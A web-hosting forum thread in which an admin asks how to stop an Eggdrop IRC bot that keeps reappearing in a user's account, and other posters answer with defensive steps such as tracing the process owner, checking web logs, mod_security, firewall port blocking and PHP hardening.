i've seen eggdrop (counterstrike) pop up on my server every now and again. what pisses me off is that i can't trace it- i know its not the user himself installing it- i've modified his password and hsi username even but can't see how it keeps coming back in his user space.
right now every time i see it pop up i do a kill -9 <process id> and then rm the eggdrop folder.
however this is annoying.
can you guys suggest anything to get rid of eggdrop, or prevent it from running in the first place?
Eggdrop is an IRC (Internet Relay Chat) bot, I'm mentioning this since you wrote counterstrike in parenthesis next to it but eggdrop has nothing to do with gameservers.
You should generally prevent or restrict users from running processes (any of them, not just eggdrop) as that can get you in a lot of trouble (i.e using your server for dDoS attacks). The most common way someone was able to run a process (i.e an eggdrop) without your knowledge and without having SSH/TELNET access is possibly through your web server. I'd recommend you to do: 'ps auxww | grep eggdrop' next time you notice the bot running. If the account is nobody, apache, www, or any other accounts your web server (or some other server daemon) runs, then you almost know how they got it loaded.
Furthermore, there are several methods for preventing this, like restricting execute permission in some partitions like /tmp and using some third party software (i.e mod_security), while keeping all your web software updated decreasing vulnerabilities would be also wise.
Feel free to provide more information (like what 'ps auxww | grep eggdrop' shows) in order for people to be able to help you more and good luck
You could use mod_security to block off any URL with eggdrop in it, or the URL that is being used to get in.
When the eggdrop is running, use "ps auxw | grep eggdrop" to see what time it started. Then go look at the http logs (/etc/https/domlogs/thedomain.com on cpanel) and find out what URL was being used to break in. Block that with mod_security, deleting it, or upgrading the package or otherwise fixing the vulernable code.
You could block off the IRC port, which would be a nice permanent solution. If you do an "lsof" or "netstat -p" when the eggdrop is running, you'll see what ports it has open.
As a temporary fix, you could create a directory called 'eggdrop' in the user account, owned by root mode 0 (only a bandaid but if it's script kiddies or automated may be enough).
I would enable a firewall on the server and block off the IRC ports 6660-6669 and 7000. It'll atleast stop the bots from connecting to IRC so whoever is causing the trouble might go away. You'll also want to enable safe mode in PHP along with open_basedir protection.
I personally do not recommend to have a firewall blocking intruder(s)' outgoing connections (like Lomag & PhilG adviced). Indeed that might stop them from running an eggdrop to a normal IRC server that listens on 6667/TCP, but it won't stop them from running an eggdrop (even using your server as botnet drone) into a more private IRCd that may be listening on any ports, i.e at 80/TCP (HTTP).
Additionally, if the intruder(s) realizes that you're filtering their traffic.. they might take it against you, either running some malicious processes (trying to gain root access or cause other trouble), either defacing your websites because if they're doing it through your web server's account, then most possibly they'll be able to have write permissions to some of your web files.
So the best solution for me is to prevent them on the earliest stage, from getting into the server (by filtering PHP functions or even better using mod_security) than filtering their outgoing traffic after they're actually already in the server.
Another good tip is disabling your compilers shown in the code above. Also when you find an eggdrop running don’t kill it straight away, look in the /proc/<pid>/ folder as it sometimes has good info.
By the way, saying "I tried the firewall stuff, it gets too complicated. there has to be an easier solution..." is simply appalling from any admin! A firewall is a must. Being a web host or hosting web sites is a very important job. Security should be top notch!
God if only everyone actually patched there servers there would be SOOO much less crap on the net!